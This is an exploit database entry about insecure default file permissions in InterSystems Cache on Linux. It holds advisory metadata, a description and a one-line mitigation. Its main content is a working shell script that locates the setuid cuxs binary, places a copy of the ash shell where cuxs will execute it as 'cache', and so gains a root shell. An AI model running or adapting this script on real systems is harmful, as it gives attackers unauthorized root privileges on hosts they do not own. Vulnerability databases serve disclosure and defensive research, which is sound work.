Insecure Default Permissions

vendor:

Cache

by:

kokaninATdtors

7,2

CVSS

HIGH

Insecure Default Permissions

N/A

CWE

Product Name: Cache

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2003

Insecure Default Permissions

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. A snippet from an strace of the cuxs binary shows that it is possible to execute the cache binary, which is set to be +s. An attacker can use this to copy the ash binary to the cache directory and execute it, allowing them to gain root privileges.

Mitigation:

Ensure that the permissions set on the files and directories comprising InterSystems Cache are secure and do not allow for any user to overwrite any file.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET